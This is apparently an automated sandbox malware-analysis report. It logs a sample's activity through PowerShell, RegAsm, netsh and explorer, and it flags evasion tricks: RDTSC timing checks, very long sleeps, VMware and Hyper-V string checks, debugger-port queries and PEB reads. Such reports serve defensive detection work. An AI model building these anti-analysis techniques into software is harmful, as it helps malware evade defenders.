Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Switches to a custom stack to bypass stack traces
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API/Special instruction interceptor: Address: 7FFCC372D324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API/Special instruction interceptor: Address: 7FFCC3730774
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API/Special instruction interceptor: Address: 7FFCC3730154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API/Special instruction interceptor: Address: 7FFCC372D8A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API/Special instruction interceptor: Address: 7FFCC372DA44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API/Special instruction interceptor: Address: 7FFCC372D1E4
Source: C:\Windows\SysWOW64\netsh.exe API/Special instruction interceptor: Address: 7FFCC372D324
Source: C:\Windows\SysWOW64\netsh.exe API/Special instruction interceptor: Address: 7FFCC3730774
Source: C:\Windows\SysWOW64\netsh.exe API/Special instruction interceptor: Address: 7FFCC372D944
Source: C:\Windows\SysWOW64\netsh.exe API/Special instruction interceptor: Address: 7FFCC372D504
Source: C:\Windows\SysWOW64\netsh.exe API/Special instruction interceptor: Address: 7FFCC372D544
Source: C:\Windows\SysWOW64\netsh.exe API/Special instruction interceptor: Address: 7FFCC372D1E4
Source: C:\Windows\SysWOW64\netsh.exe API/Special instruction interceptor: Address: 7FFCC3730154
Source: C:\Windows\SysWOW64\netsh.exe API/Special instruction interceptor: Address: 7FFCC372D8A4
Source: C:\Windows\SysWOW64\netsh.exe API/Special instruction interceptor: Address: 7FFCC372DA44
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe RDTSC instruction interceptor: First address: B09904 second address: B0990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe RDTSC instruction interceptor: First address: B09B7E second address: B09B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_00409AB0 rdtsc 6_2_00409AB0
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1541 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1596 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4342 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5448 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 9736 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 886 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 863 Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Window / User API: threadDelayed 2735 Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Window / User API: threadDelayed 7237 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API coverage: 1.9 %
Source: C:\Windows\SysWOW64\netsh.exe API coverage: 1.6 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7728 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7916 Thread sleep count: 4342 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7912 Thread sleep count: 5448 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7948 Thread sleep time: -16602069666338586s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 7312 Thread sleep count: 9736 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 7312 Thread sleep time: -19472000s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 7312 Thread sleep count: 209 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 7312 Thread sleep time: -418000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe TID: 7420 Thread sleep count: 2735 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe TID: 7420 Thread sleep time: -5470000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe TID: 7420 Thread sleep count: 7237 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe TID: 7420 Thread sleep time: -14474000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\netsh.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\netsh.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 00000007.00000002.2662764839.0000000009B49000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTabVMWare
Source: explorer.exe, 00000007.00000002.2662764839.0000000009CEC000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00OwHgZXS.
Source: explorer.exe, 00000007.00000000.1523845606.0000000009C0B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ones
Source: explorer.exe, 00000007.00000000.1517673112.00000000038F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: explorer.exe, 00000007.00000000.1517673112.00000000038F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.
Source: explorer.exe, 00000007.00000000.1517673112.00000000038F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware20,1
Source: explorer.exe, 00000007.00000000.1517673112.00000000038F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
Source: explorer.exe, 00000007.00000000.1523845606.0000000009B49000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1523845606.0000000009B25000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072108638.0000000009B25000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072108638.0000000009B49000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2662764839.0000000009B25000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2662764839.0000000009B49000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000007.00000000.1523845606.0000000009C0B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}W)1
Source: explorer.exe, 00000007.00000002.2662764839.0000000009B49000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000007.00000000.1517673112.00000000038F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.NoneVMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0VMware20,1
Source: explorer.exe, 00000007.00000000.1517673112.00000000038F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SVGA IIES1371
Source: explorer.exe, 00000007.00000000.1517673112.00000000038F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware Virtual RAM
Source: explorer.exe, 00000007.00000002.2662764839.00000000099E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072108638.0000000009A4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1523845606.0000000009A4D000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter`
Source: explorer.exe, 00000007.00000000.1517673112.00000000038F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000007.00000000.1516382431.00000000012E9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000007.00000003.2072408044.0000000007C1D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2660117349.0000000007C1D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1519605877.0000000007C1D000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWystem32\DriverStore\en\machine.inf_loc
Source: explorer.exe, 00000007.00000003.2071685840.0000000009C28000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000i
Source: explorer.exe, 00000007.00000003.2071685840.0000000009C28000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000.
Source: explorer.exe, 00000007.00000000.1517673112.00000000038F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_00409AB0 rdtsc 6_2_00409AB0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0040ACF0 LdrLoadDll, 6_2_0040ACF0
Contains functionality to read the PEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030FA30B mov eax, dword ptr fs:[00000030h] 6_2_030FA30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030FA30B mov eax, dword ptr fs:[00000030h] 6_2_030FA30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030FA30B mov eax, dword ptr fs:[00000030h] 6_2_030FA30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BC310 mov ecx, dword ptr fs:[00000030h] 6_2_030BC310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E0310 mov ecx, dword ptr fs:[00000030h] 6_2_030E0310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0314930B mov eax, dword ptr fs:[00000030h] 6_2_0314930B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0314930B mov eax, dword ptr fs:[00000030h] 6_2_0314930B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0314930B mov eax, dword ptr fs:[00000030h] 6_2_0314930B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030EF32A mov eax, dword ptr fs:[00000030h] 6_2_030EF32A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0318132D mov eax, dword ptr fs:[00000030h] 6_2_0318132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0318132D mov eax, dword ptr fs:[00000030h] 6_2_0318132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030B7330 mov eax, dword ptr fs:[00000030h] 6_2_030B7330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BD34C mov eax, dword ptr fs:[00000030h] 6_2_030BD34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BD34C mov eax, dword ptr fs:[00000030h] 6_2_030BD34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0314035C mov eax, dword ptr fs:[00000030h] 6_2_0314035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0314035C mov eax, dword ptr fs:[00000030h] 6_2_0314035C
